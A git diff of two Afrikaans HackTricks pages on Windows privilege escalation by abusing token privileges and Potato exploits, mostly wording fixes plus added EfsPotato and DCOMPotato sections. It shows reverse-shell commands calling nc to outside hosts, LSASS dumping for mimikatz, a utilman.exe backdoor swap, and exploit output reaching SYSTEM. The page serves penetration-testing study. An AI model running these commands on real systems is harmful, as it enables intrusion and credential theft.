diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md index df19ed590..f28d30c3d 100644 --- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md +++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md @@ -23,11 +23,11 @@ As jy **nie weet wat Windows Toegangstokens is nie**, lees hierdie bladsy voorda [access-tokens.md](../access-tokens.md) {% endcontent-ref %} -**Miskien kan jy in staat wees om voorregte te verhoog deur die tokens wat jy reeds het, te misbruik** +**Miskien kan jy bevoegdhede verhoog deur die tokens wat jy reeds het, te misbruik** ### SeImpersonatePrivilege -Dit is 'n voorreg wat deur enige proses gehou word wat die impersonasie (maar nie die skepping) van enige token toelaat, mits 'n handvatsel daarvoor verkry kan word. 'n Bevoorregte token kan van 'n Windows-diens (DCOM) verkry word deur dit te dwing om NTLM-verifikasie teen 'n exploit uit te voer, wat die uitvoering van 'n proses met SYSTEM-voorregte moontlik maak. Hierdie kwesbaarheid kan benut word met verskeie gereedskap, soos [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (wat vereis dat winrm gedeaktiveer moet wees), [SweetPotato](https://github.com/CCob/SweetPotato), en [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). +Dit is 'n bevoegdheid wat deur enige proses gehou word wat die impersonasie (maar nie die skepping) van enige token toelaat, mits 'n handvatsel daarvoor verkry kan word. 'n Bevoorregte token kan van 'n Windows-diens (DCOM) verkry word deur dit te dwing om NTLM-verifikasie teen 'n exploit uit te voer, wat die uitvoering van 'n proses met SYSTEM-bevoegdhede moontlik maak. Hierdie kwesbaarheid kan benut word met verskeie gereedskap, soos [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (wat vereis dat winrm gedeaktiveer moet wees), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato), [DCOMPotato](https://github.com/zcgonvh/DCOMPotato) en [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). {% content-ref url="../roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../roguepotato-and-printspoofer.md) @@ -40,7 +40,7 @@ Dit is 'n voorreg wat deur enige proses gehou word wat die impersonasie (maar ni ### SeAssignPrimaryPrivilege Dit is baie soortgelyk aan **SeImpersonatePrivilege**, dit sal die **dieselfde metode** gebruik om 'n bevoorregte token te verkry.\ -Dan laat hierdie voorreg **toe om 'n primêre token** aan 'n nuwe/gesuspendeerde proses toe te ken. Met die bevoorregte impersonasietoken kan jy 'n primêre token aflei (DuplicateTokenEx).\ +Dan laat hierdie bevoegdheid **toe om 'n primêre token** aan 'n nuwe/gesuspendeerde proses toe te ken. Met die bevoorregte impersonasietoken kan jy 'n primêre token aflei (DuplicateTokenEx).\ Met die token kan jy 'n **nuwe proses** skep met 'CreateProcessAsUser' of 'n proses gesuspend en **die token stel** (in die algemeen kan jy nie die primêre token van 'n lopende proses verander nie). ### SeTcbPrivilege @@ -49,13 +49,13 @@ As jy hierdie token geaktiveer het, kan jy **KERB\_S4U\_LOGON** gebruik om 'n ** ### SeBackupPrivilege -Die stelsel word gedwing om **alle lees toegang** beheer aan enige lêer (beperk tot lees operasies) deur hierdie voorreg te verleen. Dit word gebruik vir **die lees van die wagwoord hashes van plaaslike Administrateur** rekeninge uit die register, waarna gereedskap soos "**psexec**" of "**wmiexec**" met die hash (Pass-the-Hash tegniek) gebruik kan word. Hierdie tegniek faal egter onder twee toestande: wanneer die Plaaslike Administrateur rekening gedeaktiveer is, of wanneer 'n beleid in plek is wat administratiewe regte van Plaaslike Administrateurs wat afstand doen, verwyder.\ -Jy kan **hierdie voorreg misbruik** met: +Die stelsel word gedwing om **alle lees toegang** beheer aan enige lêer te verleen (beperk tot lees operasies) deur hierdie bevoegdheid. Dit word gebruik vir **die lees van die wagwoord hashes van plaaslike Administrateur** rekeninge uit die register, waarna gereedskap soos "**psexec**" of "**wmiexec**" met die hash gebruik kan word (Pass-the-Hash tegniek). Hierdie tegniek faal egter onder twee toestande: wanneer die Plaaslike Administrateur rekening gedeaktiveer is, of wanneer 'n beleid in plek is wat administratiewe regte van Plaaslike Administrateurs wat afstand doen, verwyder.\ +Jy kan **hierdie bevoegdheid misbruik** met: * [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) * [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) * volg **IppSec** in [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec) -* Of soos verduidelik in die **verhoogde voorregte met Backup Operators** afdeling van: +* Of soos verduidelik in die **verhoogde bevoegdhede met Backup Operators** afdeling van: {% content-ref url="../../active-directory-methodology/privileged-groups-and-token-privileges.md" %} [privileged-groups-and-token-privileges.md](../../active-directory-methodology/privileged-groups-and-token-privileges.md) @@ -63,7 +63,7 @@ Jy kan **hierdie voorreg misbruik** met: ### SeRestorePrivilege -Toestemming vir **skrywe toegang** tot enige stelsellêer, ongeag die lêer se Toegang Beheer Lys (ACL), word deur hierdie voorreg verskaf. Dit bied talle moontlikhede vir verhoging, insluitend die vermoë om **dienste te verander**, DLL Hijacking uit te voer, en **debuggers** via Beeldlêer Uitvoering Opsies in te stel onder verskeie ander tegnieke. +Toestemming vir **skrywe toegang** tot enige stelsellêer, ongeag die lêer se Toegang Beheer Lys (ACL), word deur hierdie bevoegdheid verskaf. Dit bied talle moontlikhede vir verhoogde bevoegdhede, insluitend die vermoë om **dienste te wysig**, DLL Hijacking uit te voer, en **debuggers** in te stel via Beeldlêer Uitvoering Opsies onder verskeie ander tegnieke. ### SeCreateTokenPrivilege @@ -76,10 +76,10 @@ SeCreateTokenPrivilege is 'n kragtige toestemming, veral nuttig wanneer 'n gebru ### SeLoadDriverPrivilege -Hierdie voorreg laat toe om **toestel bestuurders te laai en te verwyder** met die skepping van 'n registerinvoer met spesifieke waardes vir `ImagePath` en `Type`. Aangesien direkte skrywe toegang tot `HKLM` (HKEY_LOCAL_MACHINE) beperk is, moet `HKCU` (HKEY_CURRENT_USER) eerder gebruik word. Om egter `HKCU` herkenbaar te maak vir die kern vir bestuurderkonfigurasie, moet 'n spesifieke pad gevolg word. +Hierdie bevoegdheid laat toe om **toestel bestuurders te laai en te verwyder** met die skepping van 'n register inskrywing met spesifieke waardes vir `ImagePath` en `Type`. Aangesien direkte skrywe toegang tot `HKLM` (HKEY_LOCAL_MACHINE) beperk is, moet `HKCU` (HKEY_CURRENT_USER) eerder gebruik word. Om egter `HKCU` herkenbaar te maak vir die kernel vir bestuurder konfigurasie, moet 'n spesifieke pad gevolg word. Hierdie pad is `\Registry\User\\System\CurrentControlSet\Services\DriverName`, waar `` die Relatiewe Identifiseerder van die huidige gebruiker is. Binne `HKCU` moet hierdie hele pad geskep word, en twee waardes moet gestel word: -- `ImagePath`, wat die pad na die binêre is wat uitgevoer moet word +- `ImagePath`, wat die pad na die binêre lêer is wat uitgevoer moet word - `Type`, met 'n waarde van `SERVICE_KERNEL_DRIVER` (`0x00000001`). **Stappe om te Volg:** @@ -120,11 +120,11 @@ c:\inetpub\wwwwroot\web.config ``` ### SeDebugPrivilege -Hierdie voorreg stel die **debug ander prosesse** in staat, insluitend om in die geheue te lees en te skryf. Verskeie strategieë vir geheue-inspuiting, wat in staat is om die meeste antivirus- en gasheer-inbraakvoorkomingsoplossings te omseil, kan met hierdie voorreg gebruik word. +Hierdie voorreg stel die **ontleding van ander prosesse** in staat, insluitend om in die geheue te lees en te skryf. Verskeie strategieë vir geheue-inspuiting, wat in staat is om die meeste antivirus- en gasheer-inbraakvoorkomingsoplossings te omseil, kan met hierdie voorreg gebruik word. #### Dump geheue -Jy kan [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) van die [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) gebruik om die **geheue van 'n proses** te **vang**. Spesifiek kan dit van toepassing wees op die **Local Security Authority Subsystem Service ([LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service))** proses, wat verantwoordelik is vir die stoor van gebruikersakkrediteer nadat 'n gebruiker suksesvol in 'n stelsel aangemeld het. +Jy kan [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) van die [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) gebruik om die **geheue van 'n proses te vang**. Spesifiek kan dit van toepassing wees op die **Local Security Authority Subsystem Service ([LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service))** proses, wat verantwoordelik is vir die stoor van gebruikersakkrediteer nadat 'n gebruiker suksesvol in 'n stelsel aangemeld het. Jy kan dan hierdie dump in mimikatz laai om wagwoorde te verkry: ``` @@ -161,23 +161,23 @@ Or the **script** embed in this [**post**](https://www.leeholmes.com/adjusting-t ## Table -Volledige token voorregte cheatsheet by [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), opsomming hieronder sal slegs direkte maniere lys om die voorreg te benut om 'n admin-sessie te verkry of sensitiewe lêers te lees. +Volledige token privileges cheatsheet by [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), opsomming hieronder sal slegs direkte maniere lys om die voorreg te benut om 'n admin-sessie te verkry of sensitiewe lêers te lees. | Privilege | Impact | Tool | Execution path | Remarks | | -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool | _"Dit sal 'n gebruiker toelaat om tokens na te boots en privesc na nt stelsel te gebruik met gereedskap soos potato.exe, rottenpotato.exe en juicypotato.exe"_ | Dankie [Aurélien Chalot](https://twitter.com/Defte\_) vir die opdatering. Ek sal probeer om dit binnekort in iets meer resep-agtig te herformuleer. | -| **`SeBackup`** | **Threat** | _**Built-in commands**_ | Lees sensitiewe lêers met `robocopy /b` |

- Mag meer interessant wees as jy %WINDIR%\MEMORY.DMP kan lees

- SeBackupPrivilege (en robocopy) is nie nuttig wanneer dit kom by oop lêers nie.

- Robocopy vereis beide SeBackup en SeRestore om met /b parameter te werk.

| +| **`SeBackup`** | **Dreiging** | _**Ingeboude opdragte**_ | Lees sensitiewe lêers met `robocopy /b` |

- Mag meer interessant wees as jy %WINDIR%\MEMORY.DMP kan lees

- SeBackupPrivilege (en robocopy) is nie nuttig wanneer dit kom by oop lêers nie.

- Robocopy vereis beide SeBackup en SeRestore om met /b parameter te werk.

| | **`SeCreateToken`** | _**Admin**_ | 3rd party tool | Skep arbitrêre token insluitend plaaslike admin regte met `NtCreateToken`. | | -| **`SeDebug`** | _**Admin**_ | **PowerShell** | Dubbel die `lsass.exe` token. | Skrip om te vind by [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | +| **`SeDebug`** | _**Admin**_ | **PowerShell** | Dupliseer die `lsass.exe` token. | Skrip om te vind by [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | | **`SeLoadDriver`** | _**Admin**_ | 3rd party tool |

1. Laai 'n foutiewe kern bestuurder soos szkg64.sys
2. Benut die bestuurder kwesbaarheid

Alternatiewelik kan die voorreg gebruik word om sekuriteitsverwante bestuurders te ontlaai met ftlMC ingeboude opdrag. d.w.z.: fltMC sysmondrv

|

1. Die szkg64 kwesbaarheid is gelys as CVE-2018-15732
2. Die szkg64 benuttingskode is geskep deur Parvez Anwar

| | **`SeRestore`** | _**Admin**_ | **PowerShell** |

1. Begin PowerShell/ISE met die SeRestore voorreg teenwoordig.
2. Aktiveer die voorreg met Enable-SeRestorePrivilege).
3. Hernoem utilman.exe na utilman.old
4. Hernoem cmd.exe na utilman.exe
5. Vergrendel die konsole en druk Win+U

|

Die aanval mag deur sommige AV-sagteware opgespoor word.

Alternatiewe metode berus op die vervanging van diens binêre lêers wat in "Program Files" gestoor is met dieselfde voorreg

| -| **`SeTakeOwnership`** | _**Admin**_ | _**Built-in commands**_ |

1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Hernoem cmd.exe na utilman.exe
4. Vergrendel die konsole en druk Win+U

|

Die aanval mag deur sommige AV-sagteware opgespoor word.

Alternatiewe metode berus op die vervanging van diens binêre lêers wat in "Program Files" gestoor is met dieselfde voorreg.

| +| **`SeTakeOwnership`** | _**Admin**_ | _**Ingeboude opdragte**_ |

1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Hernoem cmd.exe na utilman.exe
4. Vergrendel die konsole en druk Win+U

|

Die aanval mag deur sommige AV-sagteware opgespoor word.

Alternatiewe metode berus op die vervanging van diens binêre lêers wat in "Program Files" gestoor is met dieselfde voorreg.

| | **`SeTcb`** | _**Admin**_ | 3rd party tool |

Manipuleer tokens om plaaslike admin regte ingesluit te hê. Mag SeImpersonate vereis.

Om geverifieer te word.

| | ## Reference * Neem 'n kyk na hierdie tabel wat Windows tokens definieer: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin) -* Neem 'n kyk na [**hierdie dokument**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) oor privesc met tokens. +* Neem 'n kyk na [**hierdie papier**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) oor privesc met tokens. {% hint style="success" %} Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index e60a7d0cc..5d7f982a2 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -6,7 +6,7 @@ Leer & oefen GCP Hacking: -Ondersteun HackTricks +Support HackTricks * Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! * **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** @@ -30,10 +30,10 @@ Jy kan hul webwerf besoek en hul enjin **gratis** probeer by: *** {% hint style="warning" %} -**JuicyPotato werk nie** op Windows Server 2019 en Windows 10 bou 1809 en later nie. Tog kan [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) gebruik word om **die selfde voorregte te benut en `NT AUTHORITY\SYSTEM`** vlak toegang te verkry. Hierdie [blogpos](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) gaan in diepte in op die `PrintSpoofer` hulpmiddel, wat gebruik kan word om impersonasie voorregte op Windows 10 en Server 2019 gasheer te misbruik waar JuicyPotato nie meer werk nie. +**JuicyPotato werk nie** op Windows Server 2019 en Windows 10 bou 1809 en later nie. Tog kan [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** gebruik word om **die selfde voorregte te benut en `NT AUTHORITY\SYSTEM`** vlak toegang te verkry. Hierdie [blogpos](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) gaan in-diepte in op die `PrintSpoofer` hulpmiddel, wat gebruik kan word om impersonasie voorregte op Windows 10 en Server 2019 gasheer te misbruik waar JuicyPotato nie meer werk nie. {% endhint %} -## Vinige Demo +## Vinnige Demo ### PrintSpoofer ```bash @@ -61,8 +61,8 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f {% endcode %} ### SharpEfsPotato -``` -SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" +```bash +> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. @@ -77,13 +77,36 @@ df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: [+] Process created, enjoy! C:\temp>type C:\temp\w.log +nt authority\system +``` +### EfsPotato +```bash +> EfsPotato.exe "whoami" +Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). +Part of GMH's fuck Tools, Code By zcgonvh. +CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] + +[+] Current user: NT Service\MSSQLSERVER +[+] Pipe: \pipe\lsarpc +[!] binding ok (handle=aeee30) +[+] Get Token: 888 +[!] process with pid: 3696 created. +============================== +[x] EfsRpcEncryptFileSrv failed: 1818 + nt authority\system ``` ### GodPotato +```bash +> GodPotato -cmd "cmd /c whoami" +# You can achieve a reverse shell like this. +> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` -GodPotato -cmd "cmd /c whoami" -GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" -``` +### DCOMPotato + +![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) + + ## Verwysings * [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) @@ -91,12 +114,14 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" * [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) +* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) +* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) ### [WhiteIntel](https://whiteintel.io)
-[**WhiteIntel**](https://whiteintel.io) is 'n **dark-web** aangedrewe soekenjin wat **gratis** funksies bied om te kontroleer of 'n maatskappy of sy kliënte **gekompromitteer** is deur **stealer malwares**. +[**WhiteIntel**](https://whiteintel.io) is 'n **dark-web** aangedrewe soekenjin wat **gratis** funksies bied om te kyk of 'n maatskappy of sy kliënte **gekompromitteer** is deur **stealer malwares**. Hul primêre doel van WhiteIntel is om rekening oorname en ransomware-aanvalle te bekamp wat voortspruit uit inligting-steel malware. @@ -112,7 +137,7 @@ Leer & oefen GCP Hacking: Ondersteun HackTricks -* Kontroleer die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! * **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.